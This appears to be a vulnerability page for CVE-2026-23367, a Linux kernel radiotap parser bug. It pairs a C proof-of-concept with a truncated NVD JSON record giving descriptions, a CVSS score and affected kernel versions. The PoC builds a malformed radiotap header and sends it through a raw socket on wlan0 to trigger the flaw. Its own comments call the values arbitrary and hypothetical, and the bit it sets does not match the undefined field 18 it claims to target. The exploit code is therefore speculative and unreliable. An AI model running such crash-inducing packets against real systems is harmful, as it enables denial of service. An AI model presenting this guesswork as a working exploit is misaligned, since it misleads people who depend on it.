CVE-2026-23367

// PoC for CVE-2026-23367: Linux Kernel radiotap uninitialized variable // This is a conceptual PoC demonstrating how to craft a malformed radiotap header. // Compilation: gcc -o poc_radiotap poc_radiotap.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_packet.h> #include <linux/if_ether.h> #include <net/if.h> int main() { int sockfd; struct sockaddr_ll sa; char buffer[256]; // Create a raw socket for 802.11 frames sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (sockfd < 0) { perror("Socket creation failed"); return 1; } memset(&sa, 0, sizeof(sa)); // Set interface index (e.g., wlan0), usually requires finding the index first sa.sll_ifindex = if_nametoindex("wlan0"); sa.sll_family = AF_PACKET; // Construct malformed Radiotap header // This header attempts to include an undefined field to trigger the bug. memset(buffer, 0, sizeof(buffer)); // Radiotap header version buffer[0] = 0; // Length of header (set arbitrarily for PoC) buffer[2] = 20; // Present flags bitmap - setting a bit that might lead to undefined field parsing // exploiting the logic where field 18 is undefined buffer[4] = 0x00; buffer[5] = 0x04; // Hypothetical flag to trigger undefined field path // Send the packet if (sendto(sockfd, buffer, 64, 0, (struct sockaddr*)&sa, sizeof(sa)) < 0) { perror("Send failed"); } else { printf("Malformed packet sent to trigger CVE-2026-23367\n"); } close(sockfd); return 0; }

{"cve": {"id": "CVE-2026-23367", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:36.000", "lastModified": "2026-04-24T18:41:25.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: radiotap: reject radiotap with unknown bits\n\nThe radiotap parser is currently only used with the radiotap\nnamespace (not with vendor namespaces), but if the undefined\nfield 18 is used, the alignment/size is unknown as well. In\nthis case, iterator->_next_ns_data isn't initialized (it's\nonly set for skipping vendor namespaces), and syzbot points\nout that we later compare against this uninitialized value.\n\nFix this by moving the rejection of unknown radiotap fields\ndown to after the in-namespace lookup, so it will really use\niterator->_next_ns_data only for vendor namespaces, even in\ncase undefined fields are present."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nwifi: radiotap: rechazar radiotap con bits desconocidos\n\nEl analizador de radiotap actualmente solo se utiliza con el espacio de nombres de radiotap (no con espacios de nombres de proveedor), pero si se utiliza el campo indefinido 18, la alineación/tamaño también es desconocido. En este caso, iterator-&gt;_next_ns_data no está inicializado (solo se establece para omitir espacios de nombres de proveedor), y syzbot señala que más tarde comparamos con este valor no inicializado.\n\nEsto se soluciona moviendo el rechazo de campos radiotap desconocidos a después de la búsqueda dentro del espacio de nombres, para que realmente utilice iterator-&gt;_next_ns_data solo para espacios de nombres de proveedor, incluso en caso de que haya campos indefinidos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.34.1", "versionEndExcluding": "5.10.253", "matchCriteriaId": "F8124DB0-E974-47F7-A4CE-1F4CEA46F14B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.167", "matchCriteriaId": "2EDC6BAF-B710-4E26-B6AA-D68922EE7B43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.130", "matchCriteriaId": "C57BB918-DF28-46B3-94F7-144176841267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.77", "matchCriteriaId": "B3D12E00-E42D-4056-B354-BAD4903C03A5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.17", "matchCriteriaId": "A5E006E4-59C7-43C1-9231-62A72219F2BA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.7", "matchCriteriaId": "69245D10-0B71-485E-80C3-A64F077004D3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.34:-:*:*:*:*:*:*", "matchCriteriaId": "A3B1BC1D-ED46-4364-A1D9-1FA74182B03A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"v ... (truncated)